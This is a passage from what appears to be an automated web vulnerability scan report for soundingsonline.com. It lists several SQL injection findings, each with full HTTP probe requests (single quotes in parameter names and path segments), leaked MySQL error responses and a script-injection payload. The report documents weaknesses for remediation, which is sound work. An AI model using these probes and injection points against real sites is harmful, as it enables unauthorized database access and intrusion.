User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.95. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/digital-publications?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/digital-publications?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.96. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /more/the-masters-series?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /more/the-masters-series?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.97. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.98. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/coastwise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/coastwise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:31 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.99. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/dispatches?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/dispatches?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.100. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/home-waters?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/home-waters?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.101. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.102. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E' HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:03:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=lav3f1huhlc18qqits80hjrgg7; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:03:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E'' AND cooki' at line 1</font>
...[SNIP]...

1.103. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues'/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and-new-york-jan?tmpl=component&print=1&page=' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues''/272642-mishaps-a-rescues-connecticut-and-new-york-jan?tmpl=component&print=1&page= HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
